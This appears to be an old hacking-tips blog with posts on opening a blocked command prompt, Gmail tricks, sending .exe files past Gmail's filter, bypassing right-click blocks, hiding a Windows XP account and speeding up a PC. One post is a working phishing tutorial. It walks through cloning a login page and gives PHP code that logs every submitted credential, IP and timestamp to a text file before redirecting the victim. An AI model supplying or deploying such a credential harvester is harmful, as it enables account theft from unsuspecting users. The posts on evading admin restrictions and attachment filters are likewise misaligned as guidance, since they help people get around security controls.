Wednesday, November 5, 2008

7 ways to open cmd when it has been blocked...

1. start - run - cmd

2. start notepad and type "" (without quotes) and save as .bat

3. open up notepad and type "start" (without quotes) and save as .bat file

4. create new shortcut - for location of the item type "" (without quotes

5. create new shortcut - for location of the item type "start" (without quotes)

6. or also you should have access to WINDOWS (in C:\ or whatever your drive is) and then you can just start cmd from there....

7. theres a downloadable program called command prompt portible which will allow you to open up a modified version of cmd (more commands)

multiple login of gmail,orkut in firefox

Just follow the following steps and you will be able to login in gmail and orkut with multiple accounts. Through this you will be able to make profiles in your firefox.

Step 1:
Open system properties(by right clicking my computer), choose tab advanced, click to environment variables button. in system variables section, click new. type this information to each textbox.

Step 2:
variable name: moz_no_remote (should be all small letter).

variable value: 1

Step 3:
open firefox icon's properties(from desktop and quick launch). add extension -p to command line(like "c:\program files\mozilla firefox\firefox.exe" -p). press ok.
When you will open firefox it will prompt for profile selection create a profile,open firefox login to orkut open once more use another profile login.

Gmail Trick

Use Gmail Generate Unlimited E-mail Addresses:-

Gmail has an interesting quirk where you can add a plus sign (+) after your Gmail address, and it'll still get to your inbox. It's called plus-addressing, and it essentially gives you an unlimited number of e-mail addresses to play with. Here's how it works: say your address is, and you want to automatically label all work e-mails. Add a plus sign and a phrase to make it and set up a filter to label it work (to access your filters go to Settings->Filters and create a filter for messages addressed to Then add the label work).

More real world examples:

Find out who is spamming you: Be sure to use plus-addressing for every form you fill out online and give each site a different plus address.

Example: You could use for for
Then you can tell which site has given your e-mail address to spammers, and automatically send them to the trash.

Automatically label your incoming mail: I've talked about that above.

Archive your mail: If you receive periodic updates about your bank account balance or are subscribed to a lot of mailing lists that you don't check often, then you can send that sort of mail to the archives and bypass your Inbox.

Example: For the mailing list, you could give as your address, and assign a filter that will archive mail to that address automatically. Then you can just check in once in a while on the archive if you want to catch up.

steps to send an .exe file in gmail.

Hi all,

Here are the steps to send an .exe file in gmail.

1.Select the .exe file u want
2.Change the extension to .dat or whatever name u prefer (just rename it to .txt file)
(to change extension, right click, select rename, at the last letter of the word type . and the extension name)

3.Now send the file as attachment to the sender
4.Ask the sender to rename the file to .exe

old stuff...good 4 ...0 level beginners

Thursday, September 4, 2008

How To make a basic Phisher

this is for education purpose only.

this is a step by step tutorial on how to make a phishing page to get account information for various websites from many people. This is only how to make the page, but it is up to you to decide how you are going to get people to fall for it.

1. For this tut, we will use as our page that we would like to make a phisher of.

2. Go to

and navigate to the premium account log-in screen at the url :
3. We will now begin to make our phisher. Start by right clicking on the page and click view source.

4. Select all and paste into a notepad document.

5. You should see a bunch of random html coding, but we are only interested in two words: method and action.

6. Do a search in the document for the word "method" (without quotes).

7. Your result should be something like : method="post"

8. Change the word post to the word get.

9. Now do a search for the word "action" (without quotes). action is usually very close to method so you may not even have to do a search for it.

10. You should see something like this:
11. Where the url in between the quotes is, replace the text with next.php so the new part says: action="next.php"

12. Save this file as index.html and create a new document on notepad.

13. In the new document, we will be making the next.php page, or the page that they are directed to after you have gotten their log-in information.

14. Copy and paste this code into the notepad document:

$datum = date('d-m-Y / H:i:s');
header("Location: Put your REDIRECT URL Here");
$handle = fopen("passez.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
fwrite($handle, "IP: $ip | Date: $datum (Date=0 GTM)\r\n");
fwrite($handle, "\r\n");

setcookie ("user", "empty", time()+3600);

15. after the word location, where it says redirect url here, put in the original log-in screen url, or the url of the page that you want to send them after they type in their information. My next.php file looks like this:

$datum = date('d-m-Y / H:i:s');
$handle = fopen("passez.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
fwrite($handle, "IP: $ip | Date: $datum (Date=0 GTM)\r\n");
fwrite($handle, "\r\n");

setcookie ("user", "empty", time()+3600);

16. Save this file as next.php and open up a new notepad document.

17. Save this document as passez.txt or whatever you want it to be called.txt. The file that you need to save it as is in the next.php file right here:
$handle = fopen("passez.txt", "a");
I chose passez.txt as my file where I want the passes to be stored, but you can change it to anything you want.

18. Go to a free web hosting client that supports php files, my personal favorite is, and upload the 3 files, making sure to delete any files that were uploaded by the web host themselves, such as a sample index.html page.

19. Go check your url and type in test as the user and test as the pass and then navigate to your pass file and see if it shows up. If it shows up SUCCESS!!! It is time to start phishing.

Wednesday, September 3, 2008

Top 20 Tips To Keep Your System Faster

1. Wallpapers: They slow your whole system down, so if you're willing to compromise, have a basic plain one instead!

2. Drivers: Update your hardware drivers as frequently as possible. New drivers tend to increase system speed especially in the case of graphics cards, their drivers are updated by the manufacturer very frequently!

3. Minimizing: If you want to use several programs at the same time then minimize those you are not using. This helps reduce the overload on RAM.

4. Boot Faster: The 'starting Windows 95/98' message on startup can delay your booting for a couple of seconds. To get rid of this message go to c:\ and find the file Msdos.sys. Remove the Read-Only option. Next, open it in Notepad or any other text editor. Finally, go to the text 'Options' within the file and make the following changes: Add BootDelay=0. To make your booting even faster, set add Logo=0 to remove the Windows logo at startup.

5. Restart only Windows: When restarting your PC, hold down Shift to only restart Windows rather than the whole system which will only take a fraction of the time.

6. Turn Off Animations: Go to Display Settings from the Control Panel and switch to the Effects Tab. Now turn off Show Windows Content While Dragging and Smooth Edges on Screen Fonts. This tip is also helpful with Windows XP because of the various fade/scroll effects.

7. Faster Start-Menu Access: Go to the Start menu and select Run. Now type Regedit and hit Enter. The Registry Editor will appear on the screen. Now, open the folder HKEY_CURRENT_USER\Control Panel\Desktop. You should see a MenuShowDelay value. If you don't then do the following: right click on a blank space in the right pane and select New\String. Change the name in the new value to MenuShowDelay. Now that we have the MenuShowDelay value, double click on it and enter 0 in the value data field. This sets the start menu delay to 0 milliseconds.
8. Resolutions: If you are willing to do anything for faster performance from your PC, then try lowering your display resolution. The lower it is, the faster your PC.

9. Turn off Active Desktop: Go to your Display Properties and switch to the Web tab. Uncheck View My Active Desktop As a Web Page. Since the Active Desktop option under Windows 98 uses a lot of system resources, this option can have a dramatic effect on the speed of the whole system.

10. Defragment Often: Windows 98's Defrag tool uses Application Acceleration from Intel which means that when you defragment your drive, data is physically arranged on the drive so that applications will load faster.

11. Take your PC to Bed: Using the Advanced Power Management feature under Windows 98 gives you the option to use the sleep command. That way, you can send your PC to sleep instead of shutting it down and then restarting it. It's as simple as pressing a button and then pressing the same button to wake it up. You can tell Windows after how many minutes/hours of inactivity to automatically sleep the machine in the Advanced Power Management section of the Control Panel.

12. Faster Internet Access: If you use the internet for reference and the sites you visit are rarely updated then try the following. In IE (the same can be done in Netscape) go to Tools, Internet Options. Next, click on Settings... in the Temporary Internet Files section. Finally, select Never for the first option and double the amount of storage space to use, click OK!

13. Benchmarking: Benchmarking can be very useful when run frequently. It can tell you how your PC's components are performing and then compare them to other machines like yours. For example, when you overclock your PC, you want to know how much more speed you have and whether it is stable. All this and more can be discovered using benchmarking. An excellent piece of software for doing this job is SiSoft Sandra which can be found in the Downloads File Archive!

14. Refresh the Taskbar without restarting: If you in some way change the taskbar, either in Regedit or elsewhere, you can refresh the task bar without restarting. Hold down Ctrl Alt Del, and double click on Explorer. Say Yes to close Explorer, but no to closing Windows. This will refresh the Taskbar and system tray.

15. Quick CD Eject: Instead of pushing the button on your drive, right-click your CD drive letter in My Computer and click on Eject. This will also remove any icons that have become associated with the CD drive.

16. Start Up Programs: Windows can be slowed down when programs run on start up. To eliminate this, check your Start up folder. You can access it from the start menu: Start, Programs, Start Up. Another way to eliminate programs from loading even before Windows actually starts is by doing the following: Click on Start, then Run. Type msconfig. It will take quite a long time for this program to load, but when you finally see it on your screen, explore the different tabs. They all have to do with how quickly your PC boots, so select what you want, and uncheck what you don't want!

17. Fonts: When Windows starts, it loads every single font in the Fonts folder. Therefore, the more fonts you have, the slower the booting process. To get rid of unwanted fonts, simply go to the Fonts folder under c:\windows and remove whatever you don't want. Fonts that have a red letter 'A' as their icon are system fonts, so don't delete them.

18. Stretching Wallpapers: Don't "stretch" your wallpaper in Windows 98 since it actually slows Windows down when you drag icons around on the desktop.

19. RAM Matters: If you have less than 32MB then you should seriously think of upgrading it to at least 64MB. Windows runs much more smoothly with 64MB or higher and tends to use less hard disk space for virtual memory.

20. Partitioning: A very nice little thing you can do to boost system performance. By partitioning your hard drive, splitting one physical drive into several logical ones, you can gain several advantages. 1. If you get a virus or you accidentally format a drive, not all will be lost. 2. By placing the swap file (Win386.swp) on a separate drive, The swap file will be less fragmented and thus, faster. 3. Place Windows on a separate drive and whenever you need to reinstall it, you rest assured that your data is safe on a separate drive. Partitioning can be done using a few programs such as FDisk which comes with DOS. However, FDisk formats everything on the hard disk before partitioning. Alternatively, you can use Partition Magic from Power Quest to partition your hard disk without losing your data.

Enable right click on websites that disables it

Many websites nowadays disable the right click function of the mouse button which I think could be very annoying sometimes. This is done so that we can’t steal images, file, video, or any other website’s stuff. What about if we extremely in a need of the file without any profit-making and other bad intentions? In this post a tutorial is included to teach you how to solve the problem, without having to open the source code of course!

If you use Internet Explorer 6 and 7

Click “Tools”->”Internet Options”
Click the “Security” tab.
Click “Custom Level”
Scroll down to the “scripting” section.
Set “Active Scripting” to “disable” (Active scripts are programs written in Javascript)
Click “Ok”. Restart your internet browser.
Note: This will disable the Javascript from being rendered by your Internet Explorer browser which would mean the right click disabled’s script in the website will not work anymore.

For Mozilla Firefox browser, these are the steps which gave the same effect (maybe be vary depending on the version).

Go to “Tools” -> “Options”
Click “Web Features”
Untick enable JavaScript

Create an Hidden User Account in XP

#[Start] [Run] [Regedit]
#Registry Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\
#Modify/Create the Value Data Type(s) and Value Name(s) as detailed below.
#Data Type: REG_DWORD [Dword Value] // Value Name: Type Name of Account to be Hidden
#Setting for Value Data: [0 = Account is Hidden / 1 = Enabled]
#Exit Registry and Reboot...

While the account is hidden on the Welcome screen, note that the account profile will be visible in C:\Documents and Settings or wherever user profiles are stored as well as in Local Users and Groups


Themes 4 Orkut

Hey folks.. and all the crazy active members...
I would love to get your support and co-operation.. in this venture of mine..!

Everybody loves to put up... Innvoative Orkut Names...

I have been updating my list every 2 days.. for the last 2 yrs..and have got a huge catalogue of Orkut names...

I would love to share all thsoe names with you..and maybe you all just choose one from those as your own Name...

Tuesday, August 19, 2008

Control mouse with key pad

You can control your mouse pointer with keyboard keys in all windows versions. When your mouse stops working, you can enable this keyboard feature to complete your important work. This keyboard mouse can performs all tasks same like a normal mouse.

Follow the given steps to activate the keyboard mouse:

To edit this feature, first you should log onto your computer with administrative rights.

To activate this feature, press Alt+Shift+NumLock keys at once and you will receive a small MouseKey box.

To keep MouseKeys on, click on Ok button or click on cancel button to cancel MouseKeys box.

Click on Settings button, if you want to adjust the mouse cursor detail settings.

Here a new dialog box will appear with the title Settings for MouseKeys", now you can manage all mouse settings for example mouse cursor speed, acceleration and some other features.

Now using Numeric keypad, you can move your mouse pointer. The controls are:


1,2,3,4,6,7,8 and 9 keys are used to move the mouse cursor into different directions.

Key 5 is used as mouse click button.

Insert key used to hold down mouse button.

+ Sign used to double click on any object.

Delete button used to release the mouse.

Click on NumLock button to disable this keyboard mouse feature.

Color Your folder

With ColorFolder, give some color to WindowsXP folders.
With just a right-click, colorize your folders, and discover
a new intuitive way to classify your files. A quick view is
now enough to identify the folder you are looking for !

ColorFolder is a very light soft, that doesn't stay in memory. It uses a native
functionnality of WindowsXP to be more efficient. Discover it's simplicity : with a
single right-click on a folder you colorize it ; the necessary and only the necessary.

The Best xp Login Screen

3D Web Browser
